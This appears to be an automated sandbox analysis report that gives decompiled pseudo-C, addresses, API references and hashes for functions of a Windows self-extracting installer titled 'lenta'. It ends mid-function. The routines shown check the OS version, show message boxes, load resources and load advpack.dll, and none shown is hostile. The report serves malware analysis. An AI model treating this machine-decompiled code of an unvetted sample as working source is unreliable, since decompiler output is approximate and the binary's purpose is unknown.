                            • Instruction ID: 6948eedc610550f6264932913c8e943015b760ab2e41e84f3eb168288ba29aea
                            • Opcode Fuzzy Hash: 8284d99e71a97803e3c3b2f3f53aff3beb9e3d32215b0f90433abcc95f3015a6
                            • Instruction Fuzzy Hash: B811B170201201AFD721AF37AD0AE973AFDDFD5710F14663EB641F62F2DA7988049661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E00EB24E0(void* __ebx) {
                            				signed int _v8;
                            				char _v268;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t7;
                            				void* _t20;
                            				long _t26;
                            				signed int _t27;
                            
                            				_t20 = __ebx;
                            				_t7 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t7 ^ _t27;
                            				_t25 = 0x104;
                            				_t26 = 0;
                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                            					E00EB658A( &_v268, 0x104, "wininit.ini");
                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                            					_t25 = _lopen( &_v268, 0x40);
                            					if(_t25 != 0xffffffff) {
                            						_t26 = _llseek(_t25, 0, 2);
                            						_lclose(_t25);
                            					}
                            				}
                            				return E00EB6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                            			}











                            0x00eb24e0
                            0x00eb24eb
                            0x00eb24f2
                            0x00eb24f7
                            0x00eb2504
                            0x00eb250e
                            0x00eb251d
                            0x00eb252c
                            0x00eb2541
                            0x00eb2546
                            0x00eb2553
                            0x00eb2555
                            0x00eb2555
                            0x00eb2546
                            0x00eb256c

                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00EB2506
                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00EB252C
                            • _lopen.KERNEL32 ref: 00EB253B
                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00EB254C
                            • _lclose.KERNEL32(00000000), ref: 00EB2555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                            • String ID: wininit.ini
                            • API String ID: 3273605193-4206010578
                            • Opcode ID: ef12714cb904d6c9f140a97d329f86e3722a86f794a0e8bc99d804e575a1a362
                            • Instruction ID: 6b3c6c18ee6b1e52a006d5f8b317db88082c9c6b880c7c15c655290e201d3917
                            • Opcode Fuzzy Hash: ef12714cb904d6c9f140a97d329f86e3722a86f794a0e8bc99d804e575a1a362
                            • Instruction Fuzzy Hash: DC01B5326011186BCB20AB6A9C0CEDFBBBCDF45760F040265FA49F3190DF748E49CA91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E00EB36EE(CHAR* __ecx) {
                            				signed int _v8;
                            				char _v268;
                            				struct _OSVERSIONINFOA _v416;
                            				signed int _v420;
                            				signed int _v424;
                            				CHAR* _v428;
                            				CHAR* _v432;
                            				signed int _v436;
                            				CHAR* _v440;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t72;
                            				CHAR* _t77;
                            				CHAR* _t91;
                            				CHAR* _t94;
                            				int _t97;
                            				CHAR* _t98;
                            				signed char _t99;
                            				CHAR* _t104;
                            				signed short _t107;
                            				signed int _t109;
                            				short _t113;
                            				void* _t114;
                            				signed char _t115;
                            				short _t119;
                            				CHAR* _t123;
                            				CHAR* _t124;
                            				CHAR* _t129;
                            				signed int _t131;
                            				signed int _t132;
                            				CHAR* _t135;
                            				CHAR* _t138;
                            				signed int _t139;
                            
                            				_t72 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t72 ^ _t139;
                            				_v416.dwOSVersionInfoSize = 0x94;
                            				_t115 = __ecx;
                            				_t135 = 0;
                            				_v432 = __ecx;
                            				_t138 = 0;
                            				if(GetVersionExA( &_v416) != 0) {
                            					_t133 = _v416.dwMajorVersion;
                            					_t119 = 2;
                            					_t77 = _v416.dwPlatformId - 1;
                            					__eflags = _t77;
                            					if(_t77 == 0) {
                            						_t119 = 0;
                            						__eflags = 1;
                            						 *0xeb8184 = 1;
                            						 *0xeb8180 = 1;
                            						L13:
                            						 *0xeb9a40 = _t119;
                            						L14:
                            						__eflags =  *0xeb8a34 - _t138; // 0x0
                            						if(__eflags != 0) {
                            							goto L66;
                            						}
                            						__eflags = _t115;
                            						if(_t115 == 0) {
                            							goto L66;
                            						}
                            						_v428 = _t135;
                            						__eflags = _t119;
                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                            						_t11 =  &_v420;
                            						 *_t11 = _v420 & _t138;
                            						__eflags =  *_t11;
                            						_v440 = _t115;
                            						do {
                            							_v424 = _t135 * 0x18;
                            							_v436 = E00EB2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                            							_t91 = E00EB2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                            							_t123 = _v436;
                            							_t133 = 0x54d;
                            							__eflags = _t123;
                            							if(_t123 < 0) {
                            								L32:
                            								__eflags = _v420 - 1;
                            								if(_v420 == 1) {
                            									_t138 = 0x54c;
                            									L36:
                            									__eflags = _t138;
                            									if(_t138 != 0) {
                            										L40:
                            										__eflags = _t138 - _t133;
                            										if(_t138 == _t133) {
                            											L30:
                            											_v420 = _v420 & 0x00000000;
                            											_t115 = 0;
                            											_v436 = _v436 & 0x00000000;
                            											__eflags = _t138 - _t133;
                            											_t133 = _v432;
                            											if(__eflags != 0) {
                            												_t124 = _v440;
                            											} else {
                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                            												_v420 =  &_v268;
                            											}
                            											__eflags = _t124;
                            											if(_t124 == 0) {
                            												_t135 = _v436;
                            											} else {
                            												_t99 = _t124[0x30];
                            												_t135 = _t124[0x34] + 0x84 + _t133;
                            												__eflags = _t99 & 0x00000001;
                            												if((_t99 & 0x00000001) == 0) {
                            													asm("sbb ebx, ebx");
                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                            												} else {
                            													_t115 = 0x104;
                            												}
                            											}
                            											__eflags =  *0xeb8a38 & 0x00000001;
                            											if(( *0xeb8a38 & 0x00000001) != 0) {
                            												L64:
                            												_push(0);
                            												_push(0x30);
                            												_push(_v420);
                            												_push("lenta");
                            												goto L65;
                            											} else {
                            												__eflags = _t135;
                            												if(_t135 == 0) {
                            													goto L64;
                            												}
                            												__eflags =  *_t135;
                            												if( *_t135 == 0) {
                            													goto L64;
                            												}
                            												MessageBeep(0);
                            												_t94 = E00EB681F(_t115);
                            												__eflags = _t94;
                            												if(_t94 == 0) {
                            													L57:
                            													0x180030 = 0x30;
                            													L58:
                            													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                            													__eflags = _t115 & 0x00000004;
                            													if((_t115 & 0x00000004) == 0) {
                            														__eflags = _t115 & 0x00000001;
                            														if((_t115 & 0x00000001) == 0) {
                            															goto L66;
                            														}
                            														__eflags = _t97 - 1;
                            														L62:
                            														if(__eflags == 0) {
                            															_t138 = 0;
                            														}
                            														goto L66;
                            													}
                            													__eflags = _t97 - 6;
                            													goto L62;
                            												}
                            												_t98 = E00EB67C9(_t124, _t124);
                            												__eflags = _t98;
                            												if(_t98 == 0) {
                            													goto L57;
                            												}
                            												goto L58;
                            											}
                            										}
                            										__eflags = _t138 - 0x54c;
                            										if(_t138 == 0x54c) {
                            											goto L30;
                            										}
                            										__eflags = _t138;
                            										if(_t138 == 0) {
                            											goto L66;
                            										}
                            										_t135 = 0;
                            										__eflags = 0;
                            										goto L44;
                            									}
                            									L37:
                            									_t129 = _v432;
                            									__eflags = _t129[0x7c];
                            									if(_t129[0x7c] == 0) {
                            										goto L66;
                            									}
                            									_t133 =  &_v268;
                            									_t104 = E00EB28E8(_t129,  &_v268, _t129,  &_v428);
                            									__eflags = _t104;
                            									if(_t104 != 0) {
                            										goto L66;
                            									}
                            									_t135 = _v428;
                            									_t133 = 0x54d;
                            									_t138 = 0x54d;
                            									goto L40;
                            								}
                            								goto L33;
                            							}
                            							__eflags = _t91;
                            							if(_t91 > 0) {
                            								goto L32;
                            							}
                            							__eflags = _t123;
                            							if(_t123 != 0) {
                            								__eflags = _t91;
                            								if(_t91 != 0) {
                            									goto L37;
                            								}
                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                            								L27:
                            								if(__eflags <= 0) {
                            									goto L37;
                            								}
                            								L28:
                            								__eflags = _t135;
                            								if(_t135 == 0) {
                            									goto L33;
                            								}
                            								_t138 = 0x54c;
                            								goto L30;
                            							}
                            							__eflags = _t91;
                            							_t107 = _v416.dwBuildNumber;
                            							if(_t91 != 0) {
                            								_t131 = _v424;
                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                            									goto L37;
                            								}
                            								goto L28;
                            							}
                            							_t132 = _t107 & 0x0000ffff;
                            							_t109 = _v424;
                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                            								goto L28;
                            							}
                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                            							goto L27;
                            							L33:
                            							_t135 =  &(_t135[1]);
                            							_v428 = _t135;
                            							_v420 = _t135;
                            							__eflags = _t135 - 2;
                            						} while (_t135 < 2);
                            						goto L36;
                            					}
                            					__eflags = _t77 == 1;
                            					if(_t77 == 1) {
                            						 *0xeb9a40 = _t119;
                            						 *0xeb8184 = 1;
                            						 *0xeb8180 = 1;
                            						__eflags = _t133 - 3;
                            						if(_t133 > 3) {
                            							__eflags = _t133 - 5;
                            							if(_t133 < 5) {
                            								goto L14;
                            							}
                            							_t113 = 3;
                            							_t119 = _t113;
                            							goto L13;
                            						}
                            						_t119 = 1;
                            						_t114 = 3;
                            						 *0xeb9a40 = 1;
                            						__eflags = _t133 - _t114;
                            						if(__eflags < 0) {
                            							L9:
                            							 *0xeb8184 = _t135;
                            							 *0xeb8180 = _t135;
                            							goto L14;
                            						}
                            						if(__eflags != 0) {
                            							goto L14;
                            						}
                            						__eflags = _v416.dwMinorVersion - 0x33;
                            						if(_v416.dwMinorVersion >= 0x33) {
                            							goto L14;
                            						}
                            						goto L9;
                            					}
                            					_t138 = 0x4ca;
                            					goto L44;
                            				} else {
                            					_t138 = 0x4b4;
                            					L44:
                            					_push(_t135);
                            					_push(0x10);
                            					_push(_t135);
                            					_push(_t135);
                            					L65:
                            					_t133 = _t138;
                            					E00EB44B9(0, _t138);
                            					L66:
                            					return E00EB6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                            				}
                            			}





































                            0x00eb36f9
                            0x00eb3700
                            0x00eb370c
                            0x00eb3716
                            0x00eb3718
                            0x00eb371b
                            0x00eb3721
                            0x00eb372b
                            0x00eb373d
                            0x00eb3745
                            0x00eb3746
                            0x00eb3746
                            0x00eb3749
                            0x00eb37ab
                            0x00eb37ad
                            0x00eb37ae
                            0x00eb37b3
                            0x00eb37b8
                            0x00eb37b8
                            0x00eb37bf
                            0x00eb37bf
                            0x00eb37c5
                            0x00000000
                            0x00000000
                            0x00eb37cb
                            0x00eb37cd
                            0x00000000
                            0x00000000
                            0x00eb37d5
                            0x00eb37db
                            0x00eb37e8
                            0x00eb37ea
                            0x00eb37ea
                            0x00eb37ea
                            0x00eb37f0
                            0x00eb37f6
                            0x00eb3805
                            0x00eb3817
                            0x00eb382b
                            0x00eb3830
                            0x00eb3836
                            0x00eb383b
                            0x00eb383d
                            0x00eb38eb
                            0x00eb38eb
                            0x00eb38f2
                            0x00eb390c
                            0x00eb3911
                            0x00eb3911
                            0x00eb3913
                            0x00eb394d
                            0x00eb394d
                            0x00eb394f
                            0x00eb38a9
                            0x00eb38a9
                            0x00eb38b0
                            0x00eb38b2
                            0x00eb38b9
                            0x00eb38bb
                            0x00eb38c1
                            0x00eb3975
                            0x00eb38c7
                            0x00eb38de
                            0x00eb38e0
                            0x00eb38e0
                            0x00eb397b
                            0x00eb397d
                            0x00eb39a9
                            0x00eb397f
                            0x00eb3982
                            0x00eb398b
                            0x00eb398d
                            0x00eb398f
                            0x00eb399f
                            0x00eb39a1
                            0x00eb3991
                            0x00eb3991
                            0x00eb3991
                            0x00eb398f
                            0x00eb39af
                            0x00eb39b6
                            0x00eb3a0f
                            0x00eb3a0f
                            0x00eb3a11
                            0x00eb3a13
                            0x00eb3a19
                            0x00000000
                            0x00eb39b8
                            0x00eb39b8
                            0x00eb39ba
                            0x00000000
                            0x00000000
                            0x00eb39bc
                            0x00eb39bf
                            0x00000000
                            0x00000000
                            0x00eb39c3
                            0x00eb39c9
                            0x00eb39ce
                            0x00eb39d0
                            0x00eb39e3
                            0x00eb39e5
                            0x00eb39e6
                            0x00eb39f1
                            0x00eb39f7
                            0x00eb39fa
                            0x00eb3a01
                            0x00eb3a04
                            0x00000000
                            0x00000000
                            0x00eb3a06
                            0x00eb3a09
                            0x00eb3a09
                            0x00eb3a0b
                            0x00eb3a0b
                            0x00000000
                            0x00eb3a09
                            0x00eb39fc
                            0x00000000
                            0x00eb39fc
                            0x00eb39d3
                            0x00eb39d8
                            0x00eb39da
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb39dc
                            0x00eb39b6
                            0x00eb3955
                            0x00eb395b
                            0x00000000
                            0x00000000
                            0x00eb3961
                            0x00eb3963
                            0x00000000
                            0x00000000
                            0x00eb3969
                            0x00eb3969
                            0x00000000
                            0x00eb3969
                            0x00eb3915
                            0x00eb3915
                            0x00eb391b
                            0x00eb391f
                            0x00000000
                            0x00000000
                            0x00eb392d
                            0x00eb3933
                            0x00eb3938
                            0x00eb393a
                            0x00000000
                            0x00000000
                            0x00eb3940
                            0x00eb3946
                            0x00eb394b
                            0x00000000
                            0x00eb394b
                            0x00000000
                            0x00eb38f2
                            0x00eb3843
                            0x00eb3845
                            0x00000000
                            0x00000000
                            0x00eb384b
                            0x00eb384d
                            0x00eb3883
                            0x00eb3885
                            0x00000000
                            0x00000000
                            0x00eb389a
                            0x00eb389e
                            0x00eb389e
                            0x00000000
                            0x00000000
                            0x00eb38a0
                            0x00eb38a0
                            0x00eb38a2
                            0x00000000
                            0x00000000
                            0x00eb38a4
                            0x00000000
                            0x00eb38a4
                            0x00eb384f
                            0x00eb3851
                            0x00eb3857
                            0x00eb386e
                            0x00eb3877
                            0x00eb387b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb3881
                            0x00eb3859
                            0x00eb385c
                            0x00eb3862
                            0x00eb3866
                            0x00000000
                            0x00000000
                            0x00eb3868
                            0x00000000
                            0x00eb38f4
                            0x00eb38f4
                            0x00eb38f5
                            0x00eb38fb
                            0x00eb3901
                            0x00eb3901
                            0x00000000
                            0x00eb390a
                            0x00eb374b
                            0x00eb374e
                            0x00eb375c
                            0x00eb3764
                            0x00eb3769
                            0x00eb376e
                            0x00eb3771
                            0x00eb379c
                            0x00eb379f
                            0x00000000
                            0x00000000
                            0x00eb37a3
                            0x00eb37a4
                            0x00000000
                            0x00eb37a4
                            0x00eb3773
                            0x00eb3777
                            0x00eb3778
                            0x00eb377f
                            0x00eb3781
                            0x00eb378e
                            0x00eb378e
                            0x00eb3794
                            0x00000000
                            0x00eb3794
                            0x00eb3783
                            0x00000000
                            0x00000000
                            0x00eb3785
                            0x00eb378c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb378c
                            0x00eb3750
                            0x00000000
                            0x00eb372d
                            0x00eb372d
                            0x00eb396b
                            0x00eb396b
                            0x00eb396c
                            0x00eb396e
                            0x00eb396f
                            0x00eb3a1e
                            0x00eb3a1e
                            0x00eb3a22
                            0x00eb3a27
                            0x00eb3a3e
                            0x00eb3a3e

                            APIs
                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00EB3723
                            • MessageBeep.USER32(00000000), ref: 00EB39C3
                            • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00EB39F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Message$BeepVersion
                            • String ID: 3$lenta
                            • API String ID: 2519184315-4216304122
                            • Opcode ID: 74ad77e9dca5c87349263de911e8db5412f5a8cf45ec84bb65fe6e3fece1b764
                            • Instruction ID: 4993f34c471b4e747a10bcb732b14d5d226c9308be5a9bfbea8a2df49c512ca6
                            • Opcode Fuzzy Hash: 74ad77e9dca5c87349263de911e8db5412f5a8cf45ec84bb65fe6e3fece1b764
                            • Instruction Fuzzy Hash: AA910571A012249FDB358B39CD827EB77B4EB85308F1511AAD989B7291DB708F80CF41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E00EB6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                            				struct HRSRC__* _t6;
                            				void* _t21;
                            				struct HINSTANCE__* _t23;
                            				int _t24;
                            
                            				_t23 =  *0xeb9a3c; // 0xeb0000
                            				_t6 = FindResourceA(_t23, __edx, 5);
                            				if(_t6 == 0) {
                            					L6:
                            					E00EB44B9(0, 0x4fb, 0, 0, 0x10, 0);
                            					_t5 =  &_a16; // 0xeb2ee8
                            					_t24 =  *_t5;
                            				} else {
                            					_t21 = LoadResource(_t23, _t6);
                            					if(_t21 == 0) {
                            						goto L6;
                            					} else {
                            						if(_a12 != 0) {
                            							_push(_a12);
                            						} else {
                            							_push(0);
                            						}
                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                            						FreeResource(_t21);
                            						if(_t24 == 0xffffffff) {
                            							goto L6;
                            						}
                            					}
                            				}
                            				return _t24;
                            			}







                            0x00eb651f
                            0x00eb652a
                            0x00eb6534
                            0x00eb656b
                            0x00eb6577
                            0x00eb657c
                            0x00eb657c
                            0x00eb6536
                            0x00eb653e
                            0x00eb6542
                            0x00000000
                            0x00eb6544
                            0x00eb6547
                            0x00eb654c
                            0x00eb6549
                            0x00eb6549
                            0x00eb6549
                            0x00eb655e
                            0x00eb6560
                            0x00eb6569
                            0x00000000
                            0x00000000
                            0x00eb6569
                            0x00eb6542
                            0x00eb6587

                            APIs
                            • FindResourceA.KERNEL32(00EB0000,000007D6,00000005), ref: 00EB652A
                            • LoadResource.KERNEL32(00EB0000,00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00EB6538
                            • DialogBoxIndirectParamA.USER32(00EB0000,00000000,00000547,00EB19E0,00000000), ref: 00EB6557
                            • FreeResource.KERNEL32(00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00EB6560
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                            • String ID: .
                            • API String ID: 1214682469-1603360339
                            • Opcode ID: 95a7b3859e6171ee5dfe9f575c1a1b83534799ce8eb28727f6c589f3a2bbfadd
                            • Instruction ID: 74ff904177e7f1977fc554f560db597cbb0f44b2c62819fc4b4dedafd846cdc1
                            • Opcode Fuzzy Hash: 95a7b3859e6171ee5dfe9f575c1a1b83534799ce8eb28727f6c589f3a2bbfadd
                            • Instruction Fuzzy Hash: AF012672101205BFCF206FAA9C48DFB7A6CEB85364F040625FE14B3194D775CC208AA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E00EB6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                            				signed int _v8;
                            				char _v268;
                            				void* __edi;
                            				signed int _t9;
                            				signed char _t14;
                            				struct HINSTANCE__* _t15;
                            				void* _t18;
                            				CHAR* _t26;
                            				void* _t27;
                            				signed int _t28;
                            
                            				_t27 = __esi;
                            				_t18 = __ebx;
                            				_t9 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t9 ^ _t28;
                            				_push(__ecx);
                            				E00EB1781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
                            				_t26 = "advpack.dll";
                            				E00EB658A( &_v268, 0x104, _t26);
                            				_t14 = GetFileAttributesA( &_v268);
                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                            					_t15 = LoadLibraryA(_t26);
                            				} else {
                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                            				}
                            				return E00EB6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                            			}













                            0x00eb6495
                            0x00eb6495
                            0x00eb64a0
                            0x00eb64a7
                            0x00eb64ab
                            0x00eb64bd
                            0x00eb64c2
                            0x00eb64d3
                            0x00eb64df
                            0x00eb64e8
                            0x00eb6502
                            0x00eb64ee
                            0x00eb64f9
                            0x00eb64f9
                            0x00eb6516

                            APIs
                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00EB64DF
                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00EB64F9
                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00EB6502
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: LibraryLoad$AttributesFile
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                            • API String ID: 438848745-1955609190
                            • Opcode ID: 5c3966ae10a15ec1919a97dd928b400eb451435fe74b2ef0568ae01a4c7ba4a0
                            • Instruction ID: 73777731a244e2f33774c26c0871fe5c593d174dc11f3723ec462a4d7938ab3a
                            • Opcode Fuzzy Hash: 5c3966ae10a15ec1919a97dd928b400eb451435fe74b2ef0568ae01a4c7ba4a0
                            • Instruction Fuzzy Hash: 5C01D670605108AFDB60EB65DC45AEB7778DB50310F5016A5F585B21C0DF749E89CA51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 32%
                            			E00EB4169(void* __eflags) {
                            				int _t18;
                            				void* _t21;
                            
                            				_t20 = E00EB468F("FINISHMSG", 0, 0);
                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                            				if(_t21 != 0) {
                            					if(E00EB468F("FINISHMSG", _t21, _t20) != 0) {
                            						if(lstrcmpA(_t21, "<None>") == 0) {
                            							L7:
                            							return LocalFree(_t21);
                            						}
                            						_push(0);
                            						_push(0x40);
                            						_push(0);
                            						_push(_t21);
                            						_t18 = 0x3e9;
                            						L6:
                            						E00EB44B9(0, _t18);
                            						goto L7;
                            					}
                            					_push(0);
                            					_push(0x10);
                            					_push(0);
                            					_push(0);
                            					_t18 = 0x4b1;
                            					goto L6;
                            				}
                            				return E00EB44B9(0, 0x4b5, 0, 0, 0x10, 0);
                            			}





                            0x00eb417d
                            0x00eb418f
                            0x00eb4193
                            0x00eb41b7
                            0x00eb41d3
                            0x00eb41e6
                            0x00000000
                            0x00eb41e7
                            0x00eb41d5
                            0x00eb41d6
                            0x00eb41d8
                            0x00eb41d9
                            0x00eb41da
                            0x00eb41df
                            0x00eb41e1
                            0x00000000
                            0x00eb41e1
                            0x00eb41b9
                            0x00eb41ba
                            0x00eb41bc
                            0x00eb41bd
                            0x00eb41be
                            0x00000000
                            0x00eb41be
                            0x00000000

                            APIs
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
                              • Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
                              • Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
                              • Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
                              • Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
                              • Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF
                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00EB30B4), ref: 00EB4189
                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00EB30B4), ref: 00EB41E7
                              • Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
                              • Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                            • String ID: <None>$FINISHMSG
                            • API String ID: 3507850446-3091758298
                            • Opcode ID: 2efb8c077d03bb72126b8e3a831e7bbc5d6287d4c7fd3cd017702915f459b1b5
                            • Instruction ID: e4ba2669cc4541eb26eb6345f3794282f2639cb4c63a4ca72f7e867a2175deae
                            • Opcode Fuzzy Hash: 2efb8c077d03bb72126b8e3a831e7bbc5d6287d4c7fd3cd017702915f459b1b5
                            • Instruction Fuzzy Hash: 110121F17012243FF724262A8C96FFB22CEDBC0798F10103AB705F11C29A68CC0000B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00EB19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                            				signed int _v8;
                            				char _v520;
                            				void* __esi;
                            				signed int _t11;
                            				void* _t14;
                            				void* _t23;
                            				void* _t27;
                            				void* _t33;
                            				struct HWND__* _t34;
                            				signed int _t35;
                            
                            				_t33 = __edi;
                            				_t27 = __ebx;
                            				_t11 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t11 ^ _t35;
                            				_t34 = _a4;
                            				_t14 = _a8 - 0x110;
                            				if(_t14 == 0) {
                            					_t32 = GetDesktopWindow();
